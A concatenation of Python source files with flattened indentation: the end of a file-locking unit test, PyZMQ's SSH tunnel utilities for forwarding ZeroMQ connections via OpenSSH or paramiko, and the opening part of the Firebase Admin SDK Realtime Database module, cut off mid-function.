# First, acquire a shared lock on temp_file_path
lock.AcquireFileLock(f, lock.LOCK_SH)
processess = []
# Create 10 processes that also try to acquire shared lock from
# temp_file_path then append temp_file_path's content to temp_write_file
for _ in range(10):
p = multiprocessing.Process(
target=_ReadFileWithSharedLockBlockingThenWrite,
args=(self.temp_file_path, temp_write_file))
p.start()
processess.append(p)
for p in processess:
p.join()
# temp_write_file should contains 10 copy of temp_file_path's content.
with open(temp_write_file, 'r') as f:
self.assertEquals('0123456789'*10, f.read())
finally:
os.remove(temp_write_file)
def testNonBlockingLockAcquiring(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_status_file = tf.name
try:
with open(self.temp_file_path, 'w') as f:
lock.AcquireFileLock(f, lock.LOCK_EX)
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException raised', f.read())
finally:
os.remove(temp_status_file)
def testUnlockBeforeClosingFile(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_status_file = tf.name
try:
with open(self.temp_file_path, 'r') as f:
lock.AcquireFileLock(f, lock.LOCK_SH)
lock.ReleaseFileLock(f)
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException was not raised', f.read())
finally:
os.remove(temp_status_file)
def testContextualLock(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_status_file = tf.name
try:
with open(self.temp_file_path, 'r') as f:
with lock.FileLock(f, lock.LOCK_EX):
# Within this block, accessing self.temp_file_path from another
# process should raise exception.
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException raised', f.read())
# Accessing self.temp_file_path here should not raise exception.
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException was not raised', f.read())
finally:
os.remove(temp_status_file)
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
"""
# Copyright (C) 2010-2011 IPython Development Team
# Copyright (C) 2011- PyZMQ Developers
#
# Redistributed from IPython under the terms of the BSD License.
from __future__ import print_function
import atexit
import os
import re
import signal
import socket
import sys
import warnings
from getpass import getpass, getuser
from multiprocessing import Process
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
SSHException = paramiko.ssh_exception.SSHException
except ImportError:
paramiko = None
class SSHException(Exception):
pass
else:
from .forward import forward_tunnel
try:
import pexpect
except ImportError:
pexpect = None
from ..utils.strtypes import b
def select_random_ports(n):
"""Select and return n random ports that are available."""
ports = []
sockets = []
for i in range(n):
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock.getsockname()[1])
sockets.append(sock)
for sock in sockets:
sock.close()
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
_password_pat = re.compile(b(r'pass(word|phrase):'), re.IGNORECASE)
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop('SSH_ASKPASS', None)
ssh_newkey = 'Are you sure you want to continue connecting'
p = pexpect.spawn(cmd, env=env)
while True:
try:
i = p.expect([ssh_newkey, _password_pat], timeout=.1)
if i==0:
raise SSHException('The authenticity of the host can\'t be established.')
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavailable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel) : (str, object)
The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -O check %s" % (ssh, server)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
pid = int(output[output.find(b"(pid=")+5:output.find(b")")])
cmd = "%s -O forward -L 127.0.0.1:%i:%s:%i %s" % (
ssh, lport, remoteip, rport, server)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
atexit.register(_stop_tunnel, cmd.replace("-O forward", "-O cancel", 1))
return pid
cmd = "%s -f -S none -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop('SSH_ASKPASS', None)
ssh_newkey = 'Are you sure you want to continue connecting'
tunnel = pexpect.spawn(cmd, env=env)
failed = False
while True:
try:
i = tunnel.expect([ssh_newkey, _password_pat], timeout=.1)
if i==0:
raise SSHException('The authenticity of the host can\'t be established.')
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print(tunnel.exitstatus)
print(tunnel.before)
print(tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _stop_tunnel(cmd):
pexpect.run(cmd)
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon = True
p.start()
return p
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
db.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Firebase Realtime Database module.
This module contains functions and classes that facilitate interacting with the Firebase Realtime
Database. It supports basic data manipulation operations, as well as complex queries such as
limit queries and range queries. However, it does not support realtime update notifications. This
module uses the Firebase REST API underneath.
"""
import collections
import json
import os
import sys
import threading
from urllib import parse
import requests
import firebase_admin
from firebase_admin import exceptions
from firebase_admin import _http_client
from firebase_admin import _sseclient
from firebase_admin import _utils
_DB_ATTRIBUTE = '_database'
_INVALID_PATH_CHARACTERS = '[].?#$'
_RESERVED_FILTERS = ('$key', '$value', '$priority')
_USER_AGENT = 'Firebase/HTTP/{0}/{1}.{2}/AdminPython'.format(
firebase_admin.__version__, sys.version_info.major, sys.version_info.minor)
_TRANSACTION_MAX_RETRIES = 25
_EMULATOR_HOST_ENV_VAR = 'FIREBASE_DATABASE_EMULATOR_HOST'
def reference(path='/', app=None, url=None):
"""Returns a database ``Reference`` representing the node at the specified path.
If no path is specified, this function returns a ``Reference`` that represents the database
root. By default, the returned References provide access to the Firebase Database specified at
app initialization. To connect to a different database instance in the same Firebase project,
specify the ``url`` parameter.
Args:
path: Path to a node in the Firebase realtime database (optional).
app: An App instance (optional).
url: Base URL of the Firebase Database instance (optional). When specified, takes
precedence over the the ``databaseURL`` option set at app initialization.
Returns:
Reference: A newly initialized Reference.
Raises:
ValueError: If the specified path or app is invalid.
"""
service = _utils.get_app_service(app, _DB_ATTRIBUTE, _DatabaseService)
client = service.get_client(url)
return Reference(client=client, path=path)
def _parse_path(path):
"""Parses a path string into a set of segments."""
if not isinstance(path, str):
raise ValueError('Invalid path: "{0}". Path must be a string.'.format(path))
if any(ch in path for ch in _INVALID_PATH_CHARACTERS):
raise ValueError(
'Invalid path: "{0}". Path contains illegal characters.'.format(path))
return [seg for seg in path.split('/') if seg]
class Event:
"""Represents a realtime update event received from the database."""
def __init__(self, sse_event):
self._sse_event = sse_event
self._data = json.loads(sse_event.data)
@property
def data(self):
"""Parsed JSON data of this event."""
return self._data['data']
@property
def path(self):
"""Path of the database reference that triggered this event."""
return self._data['path']
@property
def event_type(self):
"""Event type string (put, patch)."""
return self._sse_event.event_type
class ListenerRegistration:
"""Represents the addition of an event listener to a database reference."""
def __init__(self, callback, sse):
"""Initializes a new listener with given parameters.
This is an internal API. Use the ``db.Reference.listen()`` method to start a
new listener.
Args:
callback: The callback function to fire in case of event.
sse: A transport session to make requests with.
"""
self._callback = callback
self._sse = sse
self._thread = threading.Thread(target=self._start_listen)
self._thread.start()
def _start_listen(self):
# iterate the sse client's generator
for sse_event in self._sse:
# only inject data events
if sse_event:
self._callback(Event(sse_event))
def close(self):
"""Stops the event listener represented by this registration
This closes the SSE HTTP connection, and joins the background thread.
"""
self._sse.close()
self._thread.join()
class Reference:
"""Reference represents a node in the Firebase realtime database."""
def __init__(self, **kwargs):
"""Creates a new Reference using the provided parameters.
This method is for internal use only. Use db.reference() to obtain an instance of
Reference.
"""
self._client = kwargs.get('client')
if 'segments' in kwargs:
self._segments = kwargs.get('segments')
else:
self._segments = _parse_path(kwargs.get('path'))
self._pathurl = '/' + '/'.join(self._segments)
@property
def key(self):
if self._segments:
return self._segments[-1]
return None
@property
def path(self):
return self._pathurl
@property
def parent(self):
if self._segments:
return Reference(client=self._client, segments=self._segments[:-1])
return None
def child(self, path):
"""Returns a Reference to the specified child node.
The path may point to an immediate child of the current Reference, or a deeply nested
child. Child paths must not begin with '/'.
Args:
path: Path to the child node.
Returns:
Reference: A database Reference representing the specified child node.
Raises:
ValueError: If the child path is not a string, not well-formed or begins with '/'.
"""
if not path or not isinstance(path, str):
raise ValueError(
'Invalid path argument: "{0}". Path must be a non-empty string.'.format(path))
if path.startswith('/'):
raise ValueError(
'Invalid path argument: "{0}". Child path must not start with "/"'.format(path))
full_path = self._pathurl + '/' + path
return Reference(client=self._client, path=full_path)
def get(self, etag=False, shallow=False):
"""Returns the value, and optionally the ETag, at the current location of the database.
Args:
etag: A boolean indicating whether the Etag value should be returned or not (optional).
shallow: A boolean indicating whether to execute a shallow read (optional). Shallow
reads do not retrieve the child nodes of the current database location. Cannot be
set to True if ``etag`` is also set to True.
Returns:
object: If etag is False returns the decoded JSON value of the current database location.
If etag is True, returns a 2-tuple consisting of the decoded JSON value and the Etag
associated with the current database location.
Raises:
ValueError: If both ``etag`` and ``shallow`` are set to True.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if etag:
if shallow:
raise ValueError('etag and shallow cannot both be set to True.')
headers, data = self._client.headers_and_body(
'get', self._add_suffix(), headers={'X-Firebase-ETag' : 'true'})
return data, headers.get('ETag')
params = 'shallow=true' if shallow else None
return self._client.body('get', self._add_suffix(), params=params)
def get_if_changed(self, etag):
"""Gets data in this location only if the specified ETag does not match.
Args:
etag: The ETag value to be checked against the ETag of the current location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. If the ETag
specified by the caller did not match, the boolen value will be True and the JSON
and ETag values would reflect the corresponding values in the database. If the ETag
matched, the boolean value will be False and the other elements of the tuple will be
None.
Raises:
ValueError: If the ETag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not isinstance(etag, str):
raise ValueError('ETag must be a string.')
resp = self._client.request('get', self._add_suffix(), headers={'if-none-match': etag})
if resp.status_code == 304:
return False, None, None
return True, resp.json(), resp.headers.get('ETag')
def set(self, value):
"""Sets the data at this location to the given value.
The value must be JSON-serializable and not None.
Args:
value: JSON-serializable value to be set at this location.
Raises:
ValueError: If the provided value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
self._client.request('put', self._add_suffix(), json=value, params='print=silent')
def set_if_unchanged(self, expected_etag, value):
"""Conditonally sets the data at this location to the given value.
Sets the data at this location to the given value only if ``expected_etag`` is same as the
ETag value in the database.
Args:
expected_etag: Value of ETag we want to check.
value: JSON-serializable value to be set at this location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. The boolean
indicates whether the set operation was successful or not. The decoded JSON and the
ETag corresponds to the latest value in this database location.
Raises:
ValueError: If the value is None, or if expected_etag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
# pylint: disable=missing-raises-doc
if not isinstance(expected_etag, str):
raise ValueError('Expected ETag must be a string.')
if value is None:
raise ValueError('Value must not be none.')
try:
headers = self._client.headers(
'put', self._add_suffix(), json=value, headers={'if-match': expected_etag})
return True, value, headers.get('ETag')
except exceptions.FailedPreconditionError as error:
http_response = error.http_response
if http_response is not None and 'ETag' in http_response.headers:
etag = http_response.headers['ETag']
snapshot = http_response.json()
return False, snapshot, etag
raise error
def push(self, value=''):
"""Creates a new child node.
The optional value argument can be used to provide an initial value for the child node. If
no value is provided, child node will have empty string as the default value.
Args:
value: JSON-serializable initial value for the child node (optional).
Returns:
Reference: A Reference representing the newly created child node.
Raises:
ValueError: If the value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
output = self._client.body('post', self._add_suffix(), json=value)
push_id = output.get('name')
return self.child(push_id)
def update(self, value):
"""Updates the specified child keys of this Reference to the provided values.
Args:
value: A dictionary containing the child keys to update, and their new values.
Raises:
ValueError: If value is empty or not a dictionary.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not value or not isinstance(value, dict):
raise ValueError('Value argument must be a non-empty dictionary.')
if None in value.keys():
raise ValueError('Dictionary must not contain None keys.')
self._client.request('patch', self._add_suffix(), json=value, params='print=silent')
def delete(self):
"""Deletes this node from the database.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
self._client.request('delete', self._add_suffix())
def listen(self, callback):
"""Registers the ``callback`` function to receive realtime updates.
The specified callback function will get invoked with ``db.Event`` objects for each
realtime update received from the database. It will also get called whenever the SDK
reconnects to the server due to network issues or credential expiration. In general,
the OAuth2 credentials used to authorize connections to the server expire every hour.
Therefore clients should expect the ``callback`` to fire at least once every hour, even if
there are no updates in the database.
This API is based on the event streaming support available in the Firebase REST API. Each
call to ``listen()`` starts a new HTTP connection and a background thread. This is an
experimental feature. It currently does not honor the auth overrides and timeout settings.
Cannot be used in thread-constrained environments like Google App Engine.
Args:
callback: A function to be called when a data change is detected.
Returns:
ListenerRegistration: An object that can be used to stop the event listener.
Raises:
FirebaseError: If an error occurs while starting the initial HTTP connection.
"""
return self._listen_with_session(callback)
def transaction(self, transaction_update):
"""Atomically modifies the data at this location.
Unlike a normal ``set()``, which just overwrites the data regardless of its previous state,
``transaction()`` is used to modify the existing value to a new value, ensuring there are
no conflicts with other clients simultaneously writing to the same location.
This is accomplished by passing an update function which is used to transform the current
value of this reference into a new value. If another client writes to this location before
the new value is successfully saved, the update function is called again with the new
current value, and the write will be retried. In case of repeated failures, this method
will retry the transaction up to 25 times before giving up and raising a
TransactionAbortedError. The update function may also force an early abort by raising an
exception instead of returning a value.
Args:
transaction_update: A function which will be passed the current data stored at this
location. The function should return the new value it would like written. If
an exception is raised, the transaction will be aborted, and the data at this
location will not be modified. The exceptions raised by this function are
propagated to the caller of the transaction method.
Returns:
object: New value of the current database Reference (only if the transaction commits).
Raises:
TransactionAbortedError: If the transaction aborts after exhausting all retry attempts.
ValueError: If transaction_update is not a function.
"""
if not callable(transaction_update):
raise ValueError('transaction_update must be a function.')
tries = 0
data, etag = self.get(etag=True)
while tries < _TRANSACTION_MAX_RETRIES:
new_data = transaction_update(data)
success, data, etag = self.set_if_unchanged(etag, new_data)
if success:
return new_data
tries += 1
raise TransactionAbortedError('Transaction aborted after failed retries.')
def order_by_child(self, path):
"""Returns a Query that orders data by child values.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Args:
path: Path to a valid child of the current Reference.
Returns:
Query: A database Query instance.
Raises:
ValueError: If the child path is not a string, not well-formed or None.
"""
if path in _RESERVED_FILTERS:
raise ValueError('Illegal child path: {0}'.format(path))
return Query(order_by=path, client=self._client, pathurl=self._add_suffix())
def order_by_key(self):
"""Creates a Query that orderes data by key.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$key', client=self._client, pathurl=self._add_suffix())
def order_by_value(self):
"""Creates a Query that orderes data by value.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$value', client=self._client, pathurl=self._add_suffix())
def _add_suffix(self, suffix='.json'):
return self._pathurl + suffix
def _listen_with_session(self, callback, session=None):
url = self._client.base_url + self._add_suffix()
if not session:
session = self._client.create_listener_session()
try:
sse = _sseclient.SSEClient(url, session)
return ListenerRegistration(callback, sse)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
class Query:
"""Represents a complex query that can be executed on a Reference.
Complex queries can consist of up to 2 components: a required ordering constraint, and an
optional filtering constraint. At the server, data is first sorted according to the given
ordering constraint (e.g. order by child). Then the filtering constraint (e.g. limit, range)
is applied on the sorted data to produce the final result. Despite the ordering constraint,
the final result is returned by the server as an unordered collection. Therefore the Query
interface performs another round of sorting at the client-side before returning the results
to the caller. This client-side sorted results are returned to the user as a Python
OrderedDict.
"""
def __init__(self, **kwargs):
order_by = kwargs.pop('order_by')
if not order_by or not isinstance(order_by, str):
raise ValueError('order_by field must be a non-empty string')
if order_by not in _RESERVED_FILTERS:
if order_by.startswith('/'):
raise ValueError('Invalid path argument: "{0}". Child path must not start '
'with "/"'.format(order_by))
segments = _parse_path(order_by)
order_by = '/'.join(segments)
self._client = kwargs.pop('client')
self._pathurl = kwargs.pop('pathurl')
self._order_by = order_by
self._params = {'orderBy' : json.dumps(order_by)}
if kwargs:
raise ValueError('Unexpected keyword arguments: {0}'.format(kwargs))
def limit_to_first(self, limit):
"""Creates a query with limit, and anchors it to the start of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or set_limit_last() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToLast' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToFirst'] = limit
return self
def limit_to_last(self, limit):
"""Creates a query with limit, and anchors it to the end of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or set_limit_first() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToFirst' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToLast'] = limit
return self
def start_at(self, start):
"""Sets the lower bound for a range query.
The Query will only return child nodes with a value greater than or equal to the specified
value.
Args:
start: JSON-serializable value to start at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if start is None:
raise ValueError('Start value must not be None.')
self._params['startAt'] = json.dumps(start)
return self
def end_at(self, end):
"""Sets the upper bound for a range query.
The Query will only return child nodes with a value less than or equal to the specified
value.
Args:
end: JSON-serializable value to end at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if end is None:
raise ValueError('End value must not be None.')
self._params['endAt'] = json.dumps(end)
return self
def equal_to(self, value):
"""Sets an equals constraint on the Query.
The Query will only return child nodes whose value is equal to the specified value.
Args:
value: JSON-serializable value to query for.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if value is None:
raise ValueError('Equal to value must not be None.')
self._params['equalTo'] = json.dumps(value)
return self
@property
def _querystr(self):
params = []
for key in sorted(self._params):
params.append('{0}={1}'.format(key, self._params[key]))
return '&'.join(params)
def get(self):
"""Executes this Query and returns the results.
The results will be returned as a sorted list or an OrderedDict.
Returns:
object: Decoded JSON result of the Query.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
result = self._client.body('get', self._pathurl, params=self._querystr)
if isinstance(result, (dict, list)) and self._order_by != '$priority':
return _Sorter(result, self._order_by).get()
return result
class TransactionAbortedError(exceptions.AbortedError):
"""A transaction was aborted aftr exceeding the maximum number of retries."""
def __init__(self, message):
exceptions.AbortedError.__init__(self, message)
class _Sorter:
"""Helper class for sorting query results."""
def __init__(self, results, order_by):
if isinstance(results, dict):
self.dict_input = True
entries = [_SortEntry(k, v, order_by) for k, v in results.items()]
elif isinstance(results, list):
self.dict_input = False
entries = [_SortEntry(k, v, order_by) for k, v in enumerate(results)]
else:
raise ValueError('Sorting not supported for "{0}" object.'.format(type(results)))
self.sort_entries = sorted(entries)
def get(self):
if self.dict_input:
return collections.OrderedDict([(e.key, e.value) for e in self.sort_entries])
return [e.value for e in self.sort_entries]
class _SortEntry:
"""A wrapper that is capable of sorting items in a dictionary."""
_type_none = 0
_type_bool_false = 1
_type_bool_true = 2
_type_numeric = 3
_type_string = 4
_type_object = 5
def __init__(self, key, value, order_by):
self._key = key
self._value = value
if order_by in ('$key', '$priority'):
self._index = key
elif order_by == '$value':
self._index = value
else:
self._index = _SortEntry._extract_child(value, order_by)
self._index_type = _SortEntry._get_index_type(self._index)
@property
def key(self):
return self._key
@property
def index(self):
return self._index
@property
def index_type(self):
return self._index_type
@property
def value(self):
return self._value
@classmethod
def _get_index_type(cls, index):
"""Assigns an integer code to the type of the index.
The index type determines how differently typed values are sorted. This ordering is based
on https://firebase.google.com/docs/database/rest/retrieve-data#section-rest-ordered-data
"""
if index is None:
return cls._type_none
if isinstance(index, bool) and not index:
return cls._type_bool_false
if isinstance(index, bool) and index:
return cls._type_bool_true
if isinstance(index, (int, float)):
return cls._type_numeric
if isinstance(index, str):
return cls._type_string
return cls._type_object
@classmethod
def _extract_child(cls, value, path):
segments = path.split('/')
current = value
for segment in segments:
if isinstance(current, dict):
current = current.get(segment)
else:
return None
return current
def _compare(self, other):
"""Compares two _SortEntry instances.
If the indices have the same numeric or string type, compare them directly. Ties are
broken by comparing the keys. If the indices have the same type, but are neither numeric
nor string, compare the keys. In all other cases compare based on the ordering provided
by index types.
"""
self_key, other_key = self.index_type, other.index_type
if self_key == other_key:
if self_key in (self._type_numeric, self._type_string) and self.index != other.index:
self_key, other_key = self.index, other.index
else:
self_key, other_key = self.key, other.key
if self_key < other_key:
return -1
if self_key > other_key:
return 1
return 0
def __lt__(self, other):
return self._compare(other) < 0
def __le__(self, other):
return self._compare(other) <= 0
def __gt__(self, other):
return self._compare(other) > 0
def __ge__(self, other):
return self._compare(other) >= 0
def __eq__(self, other):
return self._compare(other) == 0
class _DatabaseService:
"""Service that maintains a collection of database clients."""
_DEFAULT_AUTH_OVERRIDE = '_admin_'
def __init__(self, app):
self._credential = app.credential
db_url = app.options.get('databaseURL')
if db_url:
self._db_url = db_url
else:
self._db_url = None
auth_override = _DatabaseService._get_auth_override(app)
if auth_override not in (self._DEFAULT_AUTH_OVERRIDE, {}):
self._auth_override = json.dumps(auth_override, separators=(',', ':'))
else:
self._auth_override = None
self._timeout = app.options.get('httpTimeout', _http_client.DEFAULT_TIMEOUT_SECONDS)
self._clients = {}
emulator_host = os.environ.get(_EMULATOR_HOST_ENV_VAR)
if emulator_host:
if '//' in emulator_host:
raise ValueError(
'Invalid {0}: "{1}". It must follow format "host:port".'.format(
_EMULATOR_HOST_ENV_VAR, emulator_host))
self._emulator_host = emulator_host
else:
self._emulator_host = None
def get_client(self, db_url=None):
"""Creates a client based on the db_url. Clients may be cached."""
if db_url is None:
db_url = self._db_url
if not db_url or not isinstance(db_url, str):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a non-empty '
'URL string.'.format(db_url))
parsed_url = parse.urlparse(db_url)
if not parsed_url.netloc:
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a wellformed '
'URL string.'.format(db_url))
emulator_config = self._get_emulator_config(parsed_url)
if emulator_config:
credential = _utils.EmulatorAdminCredentials()
base_url = emulator_config.base_url
params = {'ns': emulator_config.namespace}
else:
# Defer credential lookup until we are certain it's going to be prod connection.
credential = self._credential.get_credential()
base_url = 'https://{0}'.format(parsed_url.netloc)
params = {}
if self._auth_override:
params['auth_variable_override'] = self._auth_override
